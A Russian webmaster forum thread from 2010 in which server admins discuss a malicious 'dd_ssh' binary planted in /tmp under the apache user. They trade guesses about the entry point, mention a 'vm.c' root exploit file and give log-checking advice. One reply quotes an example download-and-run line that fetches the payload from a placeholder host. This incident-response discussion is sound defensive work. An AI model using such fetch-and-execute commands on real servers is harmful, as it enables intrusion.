- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день!
Столкнулись с сабжем, есть некоторая информация по нему. Кто также столкнулся с этим, прошу отписать в теме либо по ЛС.
Вот немного поподробнее:
ls -la /tmp/| grep dd_ssh
-rwxr-xr-x 1 apache apache 1.3M Aug 4 02:56 dd_ssh
http://support.f5.com/kb/en-us/solutions/public/11000/700/sol11719.html если не подумали поискать в гугле.
http://support.f5.com/kb/en-us/solutions/public/11000/700/sol11719.html если не подумали поискать в гугле.
Искали, там лишь способы борьбы и там не расписано, как он проникает в систему.
проникает через что-то, что у вас под юзером апач работает. апач, что там у вас еще?
ищите дырявый софт (старый), стоящий по дефолтным путям. логи смотрите. изучайте этот файл... не исключен и брут, но юзер apache наводит на мысль... гляньте предка (ppid), чтоб определить откуда растут ноги
пролазить как угодно может, помню несколько лет тому массово лезли через awstats боты...
apache - это пользователь httpd для CentOS (то есть для Debian например он будет www-data), соответственно этот файл подгружается по ошибкам сайтов, а точнее их CMS, какую то из самых популярных очень-очень хорошо поимели, так как данный файл (dd_ssh) во-первых не определяется ни одним антивирусом (прогонял по вирустотал и отправлял в техподдержку каспера), а во-вторых уже много раз пойман.
госпаде .. да все просто ...дырявые веб скрипты какие нибудь через дырку выполнили
wget http://blablabla/dd_ssh -o /tmp/ && /tmp/dd_ssh и все.
посмотрите логи веб сервера на предмет cat access.log | grep wget
cat access.log | grep dd_ssh и т д.
на ред хат линукс 7.3 одно время часто была такая напасть.
перемонтируйте /tmp в noexec да и все.. уже убережет от многого
В том и проблема, что это встречается на серверах с разными CMS, списки которых не пересекаются. Похоже, сломали DLE и ShopScript либо Зебру.
Ага...
Вчера вычистил с сервера, где только стоит биллинг rootpanel. Как такой прикол?
Не хочется, чтобы бага была серьёзнее, чем просто в скрипте.
Himiko добавил 05.08.2010 в 05:52
госпаде .. да все просто ...дырявые веб скрипты какие нибудь через дырку выполнили
wget http://blablabla/dd_ssh -o /tmp/ && /tmp/dd_ssh и все.
посмотрите логи веб сервера на предмет cat access.log | grep wget
cat access.log | grep dd_ssh и т д.
на ред хат линукс 7.3 одно время часто была такая напасть.
перемонтируйте /tmp в noexec да и все.. уже убережет от многого
Это у вас всё просто.
ТС не нуб какой-то.
P.S.: /tmp на VDS не перемонтируешь.
Кстати, на 2-х серверах с такой "бякой" нашёл ещё файлик vm.c для получение рутовых привилегий. Но процессы были от юзера, значит не получили всё-таки.
P.P.S.: Все сервера, по которым обращались, были только в hetzner. Странная тенденция :)
Ага...
Вчера вычистил с сервера, где только стоит биллинг rootpanel. Как такой прикол?
Не хочется, чтобы бага была серьёзнее, чем просто в скрипте.
Himiko добавил 05.08.2010 в 05:52
Это у вас всё просто.
ТС не нуб какой-то.
P.S.: /tmp на VDS не перемонтируешь.
Кстати, на 2-х серверах с такой "бякой" нашёл ещё файлик vm.c для получение рутовых привилегий. Но процессы были от юзера, значит не получили всё-таки.
P.P.S.: Все сервера, по которым обращались, были только в hetzner. Странная тенденция :)
Спасибо за доверие :)
Да, мы его (vm.c) почти везде рядом с dd_ssh находили и видели как его как пытались скомпилировать (неуспешно, к счастью, там ошибка синтаксиса; хотя даже если ее исправить, то он все равно не сработает), а вот через что был занесен dd_ssh - не нашли, хотя проверили весьма много машин.
Также, dd_ssh никакими антируткитами/антивирусами как зловредный софт не определяется, так что подозреваю, работали явно не школьники и багами в CMS запаслись по полной. А связанность с Hetzner... ну пустили игрушку на какой-то машине на нем, вот он и сканит соседние подсетки. У нас есть примеры, когда по несколько экземпляров попалось в одной подсети.
Странно, что вирустотал не обнаружил вредокода. Отправлял на проверку в лабораторию касперского - сказали все гут=)))
а по каким критериям они определяют вредокод? если им выслать переименованный in.telnetd, определят ли его вредным? сильно сомневаюсь....
этот dd_ssh запускается? что-то слушает? интересно изучить....